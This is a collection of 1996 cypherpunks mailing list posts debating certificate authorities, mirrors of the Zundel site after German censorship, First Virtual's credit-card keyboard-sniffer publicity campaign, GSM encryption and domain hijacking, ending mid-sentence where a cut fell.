From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 1 Feb 1996 09:16:45 +0800
To: Adam Shostack <cypherpunks@toad.com
Subject: Re: Netscape, CAs, and Verisign
In-Reply-To: <199601291523.KAA03337@homeport.org>
Message-ID: <9601302350.AA29444@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



A lot of people seem to misunderstand the Verisign plan, they are not simply 
looking to be a CA, they are looking to help other people become CAs. There is 
clearly a usefull role for a company to do this. there is also a usefull role 
for two, or more.

Question is how can Netscape (or anyone else) _securely_ allow an arbitrary CA's 
certificate to be used? Certainly the process cannot be automatic. Binding the 
Verisign public key into the browser may be an undesirable solution, but the 
problem is to think of a better one.

	Phill
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Murphy <packrat@ratbox.rattus.uwa.edu.au>
Date: Thu, 1 Feb 1996 00:42:47 +0800
To: Alan Horowitz <cypherpunks@toad.com
Subject: [noise] Re: Escrowing Viewing and Reading Habits with the Governmen
In-Reply-To: <Pine.SV4.3.91.960129150914.6284C-100000@larry.infi.net>
Message-ID: <199601301215.UAA00316@ratbox.rattus.uwa.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


In message <Pine.SV4.3.91.960129150914.6284C-100000@larry.infi.net>, 
  Alan Horowitz wrote:
> 
> 
> > > Do you really think that the FBI foreign counter-intelligence squad has 
> > > nothing better to do than keep a database of who is reading Che Guevara 
> > > memoirs?
> > 
> > Heck, I remember this was a big issue about 15 years ago. Try asking
> > someone who was active in library science in the late 70's, early 80's.
> 
>     I did. They said you're wrong. Shall we start a CP flame-war of
> unattributed allegations from librarians who will recall what *they
> thought* the FBI is interested in?   

Should we instead start a CP flame war involving unattributed
allegations from librarians who are being monitored by aliens who will
recall crop circles in the microfiche?

I presume all this interest was brought about by several (relatively)
recent uses of the (alleged) information about FBI monitoring of
libraries?

What the hell, I wanted to own a copy of Applied Cryptography anyway.

--
Packrat (BSc/BE;COSO;Wombat Admin)
Nihil illegitemi carborvndvm.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <jonathon@pobox.com>
Date: Fri, 2 Feb 1996 04:16:47 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: cypher-list noise levels
Message-ID: <199601310201.VAA26901@pobox.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

  Can someone on the PGPdomo cypher-list tell me how good the signal to
noise ratio currently is, and how good the content is. I've not signed
up, but I'm tempted to try and get away from the noise on here
recently.

-Jon

--
  Jonathon Fletcher
  <jonathon@pobox.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 2 Feb 1996 04:20:36 +0800
To: cypherpunks@toad.com
Subject: Re: Downsizing the NSA
In-Reply-To: <Pine.A32.3.91.960128222000.21094A-100000@FROG.ZOO2.CS.YALE.EDU>
Message-ID: <gssJiD116w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


A semiparanoid thought struck me:

Maybe the NSA doesn't these extra 20K people, they just don't want them to
go out into the industry and build crypto for the outside world. So they
continue to pay them salaries and have them do nothing useful.

This would be kind of analogous to how when Russia no longer needed so many
nuclear scientists, the U.S. helped create "make work" jobs for them, just
so they wouldn't go to work for the likes of Iraq.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 1 Feb 1996 04:50:30 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Your own Zundelsite in five minutes or less
In-Reply-To: <4l3frc200YUrMxFuFA@andrew.cmu.edu>
Message-ID: <Pine.ULT.3.91.960130222400.27647D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Jan 1996, Declan B. McCullagh wrote:

> As of this afternoon, there are Zundelsite mirrors operating at MIT,
> Stanford University, Carnegie Mellon University, the University of
> Texas, and the University of Pennsylvania.

This doesn't tell the whole truth.

The "free world" mirrors are at Stanford, CMU, MIT, and Penn. The growth
path for these is my request to Zundel -> Zundel's drone Marc -> my site
-> Declan's most excellent evangelization -> everyone else. We believe
that this "revisionism" is crap, but don't think censorship is so cool,
either. 

The partial UT and AOL mirrors are run by white supremacists who actually 
believe this shit, and who are trying to claim credit for the whole idea, 
which among other things I find a little dishonest. I believe their 
direct source is Marc or Ingrid.

I think this no longer has any cypherpunk relevance. Censorship lost, end
of story; the only question is how quickly "they" will admit it. See
Declan's or my pages, or email me for the early history from my POV. 
Apparently Declan has been posting on this in the Well forums since 
December as well.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 1 Feb 1996 04:42:42 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: [NOISY] Your own Zundelsite in five minutes or less
Message-ID: <v02120d02ad34bb4854c5@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:55 1/30/96, Declan B. McCullagh wrote:

>As of this afternoon, there are Zundelsite mirrors operating at MIT,
>Stanford University, Carnegie Mellon University, the University of
>Texas, and the University of Pennsylvania.

I am really interested what the German government is going to do next.
Force their universities to dismount AFS?

How can we best get the fact the their censorship efforts have hit *the
wall* to their attention? Any Germans on this list that can file a
complaint against the sites with the German authorities? What about
contacting German Telekom?

We won't have won until they restore the routes to Webcom.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 2 Feb 1996 03:05:37 +0800
To: bal@martigny.ai.mit.edu
Subject: Re: Lotus Notes
Message-ID: <9601310353.AA19147@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for the explanation -- in all my discussion with RSA and
explanation to our lawyers I was thinking strictly API.  Your
quote of the RSAREF license says they won't refuse anythign reasonable,
and one would be hard-pressed to say that changing keysize for something
already not exportable isn't reasonable.

I'll have to read our license when I get to work tomorrow.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Feb 1996 04:51:14 +0800
To: cypherpunks@toad.com
Subject: Noise and the Nature of Mailing Lists
Message-ID: <ad343a693d0210040635@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:55 AM 1/31/96, Laszlo Vecsey wrote:

>FYI the traffic on the PGPdomo list has been very low lately. I haven't
>received a message from the list in a few days. But then again there is
>even more 'noise' on that list because every message I've seen posted on
>it talks about PGPdomo, the mailing list, getting PGP software to work,
>etc.. From what I've seen people just sign up to test it out with a test
>message, and thats about it. Even with mkpgp for pine its still a bit
>inconvenient to use, I think thats the reason for the low-traffic.

I've been on a fair number of mailing lists, and they basically divide up
into two broad categories:

* Category I -- Busy, contentious, lively, high volume, prone to noise
bursts, vibrant, interesting lists. Above critical mass. Like a crowded
bar, with lively debate and always something happening.

* Category II -- Quiet, polite, quiet, low volume, moribun, quiet, dead
lists. Below critical mass. Like an empty bar, with only a few drunks
staring into their beers.

* Category III -- Working mailing lists, for folks working on a specific
project or Internet standard. These can be low-volume with good signal,
because they are not primarily social discussion groups but are, instead,
simple communication-of-information groups.

The Cypherpunks list is an obvious Category I list, and has been since it
was started in October of 1992. It has noisy periods, times of flaming, but
also a "critical mass" of new thought which obviously keeps it going, and
even growing. If we are doing everything wrong, it's hard to tell from a
"who cypherpunks" query sent to majordomo@toad.com.

Other lists I have been on have been much quieter, averaging a few messages
a day (or even less). On these lists, there is just no life. The occasional
pleas for help are like cries from someone stranded on the Greenland
icesheets.

And I have seen formerly vibrant lists die off, becoming Category II
groups, or worse. One list I used to be an extremely active contributor to
was the "Extropians" list, which perhaps a dozen or so of you reading this
message are now still on. The history of it is a long and involved one,
which I won't get into, for various good reasons. But around late 1993
there were many of the same concerns about "noise" as people are now
expressing. For most of 1993 the daily posting volume on the Extropians
list exceeded the volume here on Cypherpunks. So various things were tried
(they had the advantage of not being an anarchy, and the disadvantage of
not being an anarchy). Ratings systems for posters and their posts, even
attempts to impose "quotas" on the number of posts a person could write.
All well-intentioned, but all failures and cures that were worse than the
problem.

By early 1994, both Perry Metzger and I had left the Extropians list, for
our own reasons. No doubt the list got quieter. No doubt the volume went
down.

However, and current subscribers will no doubt jump in and give their
views, I hear that the current volume of messages is less than one per day,
with--according to my sources--sometimes days between messages. (I also
hear that the Extropians are devoting more of their energy to their
magazine, which may also be a factor.)

Note that several well-intentioned efforts to create sub-lists of the
Cypherpunks list have mostly failed. The DC-Net list, the lib-tech list,
etc. I suspect that the "Remailer Operators" list is viable because it's a
Category III working group list.

Digest like CP-Lite I don't characterize as a separate kind of list.

As to the new encrypted list, I wish them well. I doubt that list will do
real well, though, because of the critical mass problem.

And remember, it's a whole lot easier using filters and reading tools to
reduce the volume of messages on an active group than it is to get an
inactive group up to critical mass!

--Tim



Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 1 Feb 1996 07:51:31 +0800
To: cypherpunks@toad.com
Subject: Re: Noise and the Nature of Mailing Lists
Message-ID: <v02120d06ad34cc164730@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:56 1/30/96, Timothy C. May wrote:

>And remember, it's a whole lot easier using filters and reading tools to
>reduce the volume of messages on an active group than it is to get an
>inactive group up to critical mass!

That is true. There is a lot of noise on this list, but there also is a lot
of signal. My growing killfile is doing a rather fine job of separating the
two. The rest can be weeded out manually in very little time.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 1 Feb 1996 07:55:42 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [NOISY] Your own Zundelsite in five minutes or less
In-Reply-To: <v02120d04ad34c75729c7@[192.0.2.1]>
Message-ID: <Pine.ULT.3.91.960130233201.27647G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[Actually this is getting relevant again, Perry]

On Tue, 30 Jan 1996, Lucky Green wrote:

> At 23:07 1/30/96, Rich Graves wrote:
> [...]
> >> We won't have won until they restore the routes to Webcom.
> >
> >Here I have trouble with the word "we," and what we're trying to
> >accomplish.
> >
> >Censorship has clearly lost. Germany is simply not going to block
> >stanford.edu, cmu.edu, mit.edu, upenn.edu, aol.com, and so on, not to
> >mention AFS.
> 
> But they succeeded in blocking Webcom. Until the block is removed, we
> haven't won. Do 'we' agree that the block should be removed?

Absitively, posilutely yes.

But it's going to be a political/bureaucratic decision made by people
without Net access or knowledge, which means it will take time. I don't 
think any more provocation is necessary. Right now, the press even in 
Germany is inclined to see us as the good guys. Every reader of 
alt.censorship, soc.culture.german. alt.revisionism, and a number of 
other groups has known how to access Zundel's writings from inside 
Germany for two days. I submit that no further penetration is necessary.
 
> >I do not believe that the battle to get people to read and care about
> >Zundel himself is ours.
> 
> Amen. I just wished that the people who's names mark some of the milestones
> in the fights for our rights (i.e, Miranda, as in Miranda Rights) were
> people whose causes I can support. Having seen concentration camps, I can
> not possibly sympathize with Mr. Zündel's views. But he still has a right
> to free speech. If he loses it, we lose it. It all comes down to this:
> 
> 
>                 First they came for the Communists,
>                   and I didn't speak up,
>...
>                 by Rev. Martin Niemoller, 1945.

Yup.

But Zundel and other Nazis now quote this too, which I find rather
offensive.  It's a battle over who owns the symbols, in part. OK, probably
nobody should own symbols or rhetorical devices. 

> >I do not want to allow the Nazis to associate themselves with "us."
> >Please see article <DM0Fsn.5GC@freenet.carleton.ca> for a little on what
> >they're trying to claim credit for. Note they are calling for mirror
> >sites nearly three days after they popped up, with no involvement on
> >their part whatsoever.
> 
> I can imagine what they wrote. "The world is supporting our cause...." No,
> I do not support their cause. I despise their cause. And I still support
> their rights.

No, it's much worse.

They are calling on their followers to establish "censorship-free zones"
at major universities. They don't even acknowledge that this was done days
ago. And they know --- one of the guys who is now calling for mirror 
sites, and totally shunning me, is the person who uploaded Zundel's files 
to my server.

They are calling major newspapers in several countries, and Time 
Magazine, proclaiming their "censorship-free zone" strategy.

They are more organized and media-savvy than I am. They are professional 
liars; "we" are not.

I do not expect these news outlets to bother to, or know how to, check
whether mirror sites had already popped up before these "demands." I do
not expect these news outlets to find out and publicize the fact that it 
was a couple of cypherpunks who detest Mr. Zundel who came up with the 
idea the afternoon of January 27th, and handed it to Zundel the next day.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Fri, 2 Feb 1996 04:18:03 +0800
To: cypherpunks@toad.com
Subject: Crypto-smart-card startup Inside Technologies
Message-ID: <199601310830.AAA06778@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


There's an article in the January 29 _EE Times_ about a French
cryptographic-smart-card startup called Inside Technologies.
Tidbits:

  ..."In public-key cryptography, 512-bit keys are typical and
  already vulnerable.  So we are looking at 640-bit-long keys
  supported by a scalable design."

  ..."Users want their own, custom algorithms, which can be
  downloaded at the time of use".

  ..."The CLU [cryptographic logic unit] will operate at a
  higher clock frequency than the RISC---60 MHz, in our
  design---yielding 640-bit RSA decrypt in less than 50 ms".

The article goes on to say that they plan to both manufacture
smart cards, presumably for ecash and communications, and
license the design at the macrocell level, possibly for use
in embedded systems like mass storage.

By my count, six European companies mentioned, zero American.

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Thu, 1 Feb 1996 14:25:48 +0800
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: The FV Problem = A Press Problem
Message-ID: <v02130500ad34a64333f5@[198.115.179.201]>
MIME-Version: 1.0
Content-Type: text/plain


        Mr. Bornenstein's press release ("FV's position on Merc article")
was egregiously self-serving and embarrassingly over-inflated.

        Yet, First Virtual's CC-focused keyboard sniffer ("...a program
which completely undermines the security of every known credit card
encryption mechanism for Internet commerce") and his postulated widespread
stealth attack on unprotected consumer PCs highlighted an obvious -- but
oft forgotten, at least in non-CompSec circles -- vulnerability.

        An encrypted link is only as secure as the CPUs at either end.  Not
an unimportant consideration as we plunge into Internet commerce; and
surely a valid point for one vendor to make, if it suggests unrecognized
risks in a competitor's scheme for consumer purchases and payments.

        Borenstein is handling his inevitable mugging in C'punks with zest
and considerable aplomb; even including an apology for submitting his
sensationalistic attack on crypto-based competitors to this List.  Before
folks leap from FV's text to damning the San Jose Mercury New's articles by
Simson Garfinkel, however, they should pause and read or maybe re-read
Garfinkel's three articles. <http://www.sjmercury.com/clips/>

        Mr. Garfinkel is probably the single most technically-literate
journalist writing about computer security for mainstream (or trade press)
media.  His Mercury News article is precisely focused on FV's initiative in
developing this demo program (a trojan screen saver) and the campaign by
the Southern California company to use the demo to illustrate a relatively
unguarded aspect of Netscape's SSL-protected credit card transactions,
which have been widely touted as the be-all of Network Commerce.

        It was, as Garfinkel bluntly put it: "a direct attack against the
security promised by Netscape Communication Corp.'s popular Netscape
Navigator..."

        Mr. Borenstein later expressed his regret that Garfinkel had cast
the story as a competitive attack, but IMNSHO Garfinkle was right on
target: the FV campaign was a targeted bombardment of their most prominent
competitor.  And a campaign it was -- well deserving media attention.

        FV apparently carted their demo code and attack model back and
forth across the country. FV gave presentations to NIST, NSA, the US
Treasury, and the White House, according to Garfinkel.

        The only silly comment in Garfinkel's article was a direct quote
from FV's Bornenstein: "One of the things we've heard from people inside
government were comments along the line, 'We thought only NSA knew how to
do this....'"

        (And if a world-class CompSec/UNIX expert like Garkinkel wasn't
chuckling when he wrote that -- and expecting knowledgeable readers to
giggle and grin when they read it --  I'll stew and eat my beaver hat!)

        The Merc's quotes from independent security experts -- commenting
on FV's attack model -- were notably dry and balanced.  Yes, the attack and
threat vectors were real -- but, noted the American Banker's Association's
Kawika Daguio: "It is a classic attack."

        "I've seen it, and I've seen things like it before," said Mr.
Daguio.  Nothing new. Matt Bishop, the UC prof, also sounded less than awed
by FV's creativity: "There is no reason why one could not write a program
to monitor keystrokes, look for numbers which look like credit card
numbers, and sent them out over the Internet," in an unobtrusive way, to a
thief elsewhere.

        (Prof. Bishop might have had more to say, had he been told it took
a FV programmer a _month_ to write a keyboard sniffer optimized for credit
card data;-)

        As a newcomer to this List, I have the impression that C'punks are
a little jaded when it comes to mass-market CompSec and ComSec threats --
and perhaps a little rabid when it comes to anyone rash enough to suggest
that the first mass-market crypto product (in the hands of naive consumers,
with unprotected PCs and poor CompSec habits) may have dangerous procedural
vulnerabilities.   A little perspective, guys!

        Crypto from an insecure base has risks that deserve to be
highlighted; and credit cards numbers are uniquely negotiable passwords.
FV is scare-mongering, sure -- but that's combat marketing.  Mr.
Borenstein's press release posted in C'punks was chumming with raw bloody
beef -- and that was just dumb -- but it was striking how blithely many
folks here acknowledged (and immediately dismissed) the threat he
described.

        Nothing wrong with FV trying to slow the bandwagon of a major
competitor by drawing attention to vulnerabilities or potential
vulnerabilities of their technology in a mass market.    This happens a lot
-- although most corporate perpetrators try to hide their hand a lot more
than FV did, and they generally sound a lot less self-righteous  -- but a
little brawling is not a bad thing, particularly in IS security.  (Some
markets, like firewalls, desperately need a little more competitive
clarity.)

        On the other hand, Mr. Borenstein's hyper-inflated presentation of
First Virtual's case all but begged for the C'punk lynch mob that has
followed him down through several threads on this List.  If he didn't
expect the reception he got, he should fire his PR advisor and get someone
who knows how to write without the purple prose and napham.

        Simson Garfinkel and the Mercury News are getting a bad rap from
folks caught up in the mob chasing Mr. Borenstein.  Read the three
articles.  The on-line version has a headline that is a bit overwrought
("Program shows ease of stealing credit information") but overall, it's a
credible, savvy, and amusing piece of journalism about FV.   Quite
professional, I'd say.

        Suerte,

                        _Vin

    Vin McLellan +The Privacy Guild+ <vin@shore.net>
 53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 1 Feb 1996 14:25:07 +0800
To: cypherpunks@toad.com
Subject: parallel encryption
Message-ID: <Pine.SUN.3.91.960131051351.13875A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ok, so I've got my BeBox and so finally have an SMP of my own again; 
anyone want to suggest any cool crypto stuff that parallelises well?
Rogaways hashs look interesting, and nDES offers an obvious process 
network for pipelining, but what about things like running multiple 
interleaved CBC streams in parallel, with each stream starting off from a 
different IV? I can't think of any practical ways of speeding up a single 
RSA operation, although twice as many processors obviously gives twice 
the thruput.

Simon
------
"GM spent $3.6 billion giving birth to the Saturn, and it doesn't even go 
 supersonic." - Ben Rich, Skunk Works head (75-91)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 1 Feb 1996 00:21:17 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: [FACTS] Germany, or "Oh no not again"
In-Reply-To: <199601310810.AAA00286@ix10.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.960131070054.6499A-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 31 Jan 1996, Bill Stewart wrote:

> ABTW, they didn't need those laws to fight "white slavery"; kidnapping
> and rape were already illegal, but any opportunity to make a law....

I have a tiny correction to Bill's assumption and that of a few
others who have commented on "white slavery."  The laws in 
question were concerned with prostitution, not kidnapping or 
rape.  The term "white slavery" arose because the social fiction
was that these women could not possibly have been prostitutes by
choice, they must have been forced into it by others.  A current
variation of this thinking is promoted by some anti porn
"feminists" with regard to women in the adult movie industry.
("No one would do THAT, in front of a camera, for money, of their 
own free will.")

Plus ca change . . .


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Thu, 1 Feb 1996 00:17:56 +0800
To: erice@internic.net
Subject: Domain hijacking, Guardian objects
Message-ID: <199601311537.HAA07915@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric,

It is good that you're open to suggestions on the Guardian
bject draft, but is just me or have you been rather quiet about it? I haven't
seen this blared from the rooftops, or even discussed in security/admin
groups with anywhere near the prominence it merits.

My main worry with the latest draft is that it seems
rather daunting. That is perhaps not so important anymore, as
teh days of DIY domain registrations are over, with most people
going through ISPs (unless they're pretty experienced themselves).
And I wonder what you've planned to do about the huge existing
domain base. When you make the announcement, and include
guardians in domain forms, new registrations will be OK. But it
will be a free for all as far as the others are concerned -
as the same evil.org could register a Guardian Object for victim.com,
making it impossible for poor victim.com to do simply file another
(unauthenticated) update, as is possible right now. There will
be simply nothing InterNIC could do either, as the admin and technical
contacts will all be (guarded) addresses of the evil.org owners,
so verification will be almost impossible without legal action
(for which, mind you, some may hold the InterNIC liable).

Perhaps the solution would be NOT TO ALLOW GUARDIAN OBJECTS
TO COVER OLD DOMAINs (and hosts, etc).  At least, not initially.
When the next payment comes in to cover the entry, it should
include a Guardian object application, so that will authenticate
the association between the organisation in the real world of
money, and its Net presence. Another option would be to
prevent modification of domains and other objects that are
'known' to be static, such as mit.edu. I don't know how 
thei would be practical for most domains, though.

Regards,
Rishab

ps. a new peer-review journal on the Internet is starting soon, with
an editorial board full of big names. I'm the international
editor with  additional charge, as it were, for technical and
security issues.  This is an informal call for papers on not-
so-obvious security holes and bottlenecks, such as the InterNIC's
lack of authentication. I'd be interested in a paper on Guardian
Objects; I'm open to writers from within the InterNIC/NSI itself.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.org (Rishab Aiyer Ghosh)
Date: Thu, 1 Feb 1996 19:01:49 +0800
To: nit@chron.com
Subject: FV's blatant double standards
Message-ID: <9601311619.AA00825@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I only just managed to go through my mail backlog and read
Simson Garfinkel's original Mercury News article. I was appalled 
by FV's double standards in evaluating security risks. Both First
Virtual and real-time transaction models (without encryption, or 
with it e.g. Netscape) require that the recipient not be compromised. 
FV relies on e-mail (domain names); Netscape relies on IP addresses. 

IP addresses are much harder to intercept than domain names
(which can be hijacked - see my earlier posts). This essentially
means that while e-mail can be mis-routed, IP packets can't.
Additionally, plaintext e-mail as well as IP traffic can often be 
sniffed along the way. 

FV demonstrated, through it's "card sharp" or whatever, that
real-time transactions are vulnerable to sniffers on the recipient's
own machine. Of course. We all knew that. But the mistake is to
assume that FV isn't _equally_ vulnerable to that threat. If you
can write a trojan that will somehow get privileged access to my
machine, trap my keystrokes, and identify my credit card number,
you can certainly write one that will, sitting on my machine:
    "intercept the user's electronic mail, read the confirmation 
    message from First Virtual's computers, and send out a fraudulent 
    reply" 
(to quote from Simson's article). Simson further quotes FV's Lee
Stein: "A single user can be targeted, Stein said, but ''it is very 
difficult. . . . There are too many packets moving . . . to too many 
different machines.''" - which is of course equally true for real-time
Netscape transactions. 

Simply put, if there's a program sitting on your computer with
privileged access, it can read your mail, hide it from you, and reply,
as easily as it can read your keystrokes. Even simpler: if there's
a privileged program on your machine, NOTHING IS SECURE - not SSL,
not FV, not plaintext credit cards, not PGP, NOTHING.

This is old hat, and FV has shown nothing new with its one-sided
stunt; the only reason there has been little hype recently about
card-sniffing trojans is that trojans and viruses and the rest of
their ilk have being dying of exposure in the media, ever since the
Internet Worm grabbed headlines years ago.

Rishab






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Thu, 1 Feb 1996 00:57:39 +0800
To: jk@digit.ee (Jyri Kaljundi)
Subject: Re: encrypted cellphones
In-Reply-To: <Pine.SOL.3.91.960131172957.4630D-100000@jaramillo.digit.ee>
Message-ID: <199601311631.IAA00339@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain




> I would say GSM security is still better than nothing. The problem is of 
> course that only tha radio link is encrypted, not the connection out into 
> public telephone network.

As I remember from discussions with a GSM encryption programmer
(which I posted to this list months ago) GSM is secure enough to prevent
real-time decryption, as keys are changed frequently using another
secure protocol (A8 I believe). GSM  encryption is only supposed
to make people like Princess Diana more secure, that's all. This was
enough for Pakistan to temporarily shut down Motorola's GSM network
in Karachi last February, until they discovered they could
intercept calls simpply by sitting at the base stations where
they're decrypted...

Rishab


> Juri Kaljundi, DigiMarket
> jk@digit.ee
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Thu, 1 Feb 1996 01:42:01 +0800
To: cypherpunks@toad.com
Subject: [NOISE] FV keyboard sniffer name contest entry
Message-ID: <Pine.SUN.3.91.960131091405.12794A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


HypeSucker

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Thu, 1 Feb 1996 02:00:22 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: [FACTS] Germany, or "Oh no not again"
Message-ID: <199601311733.JAA13166@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 12:10 AM 1/31/96 -0800, Bill Stewart wrote:

>BTW, today's "Recorder" (Bay Area legal newspaper) reports that the
>US 6th Circuit Court of Appeals upheld the Thomases' conviction.
>96 C.D.O.S 609.

The Recorder's article is at http://www.callaw.com/edt130b.html
and the opinion itself is at http://www.callaw.com/tommy.html

for those outside the Bay Area who aren't Recorder subscribers.
--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 1 Feb 1996 02:20:42 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: [NOISY] Your own Zundelsite in five minutes or less
Message-ID: <v02120d08ad353e570f00@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:45 1/30/96, Rich Graves wrote:
[...]
>I do not expect these news outlets to bother to, or know how to, check
>whether mirror sites had already popped up before these "demands." I do
>not expect these news outlets to find out and publicize the fact that it
>was a couple of cypherpunks who detest Mr. Zundel who came up with the
>idea the afternoon of January 27th, and handed it to Zundel the next day.

So we don't get the credit and the nazis do. We'll survive. Everybody on
this list knows what happend.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Thu, 1 Feb 1996 03:21:50 +0800
To: cypherpunks@toad.com
Subject: FV, Netscape and security as a product
Message-ID: <199601311753.JAA18008@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain



NSB's messages have suggested, amongst the fear-mongering, that the real
target of the card-shark publicity campaign is not Joe Consumer but bankers,
investors, and other "big money" folks; people who care about the
large-scale fraud rate of credit card use. (Yes, the rate of fraud affects
all consumers, but most people experience it as a relatively small and
unavoidable cost lost in the noise of other small costs.) NSB/FV used the
Murky News to reach those people the way that some people will rent a
freeway-visible billboard to propose marriage to a single commuter. The
trouble and expense that the sender was willing to suffer to send the
message are intended to cause the reader to take the message more seriously.
The rest of us who see the message on C-punks or drive past and wonder "Who
is Bonnie, and why is Clyde proposing marriage to her on the freeway?"
aren't an important part of the process. 

But I don't see FV's tactics as being especially different from folks at IBM
writing a virus which affects Windows but not OS/2, and quietly shopping it
around to scare Microsoft customers, or Ford underwriting an NBC news
program which shows Chevy pickups blowing up. (both are hypotheticals.)
Sure, it can be done, and perhaps it's not dishonest, and perhaps they can
wear the hat of "Consumer Protector Man", but I think it'd come across as
less offensive if it weren't presented as a discussion about security.
Statements which can be boiled down to "We think our product is superior to
our competitor's product" don't mix well with quotes from academics and a
"Chief Scientist" signature block.

While, as Vin McLellan points out, Simson Garfinkel's articles were
technically accurate (modulo the quote from Daguio, where he's quoted as
suggesting an "out of hand" transaction, which is likely either a typo or a
misunderstanding - dollars to donuts he said "out of band"), they also
appeared as part of a marketing process. Netscape and FV have both taken a
"security is a product" stance, which is a gross misrepresentation. FV and
NSB's materials have done a good job of critiquing Netscape's "security is a
product / don't worry, just look for the cute blue key" approach, but would
replace it with their own "security is a product / trust the phone but not
the net" approach. Both suggestions (and the implication of the Murky News
articles, that one can be trusted but not the other) are wrong. Security is
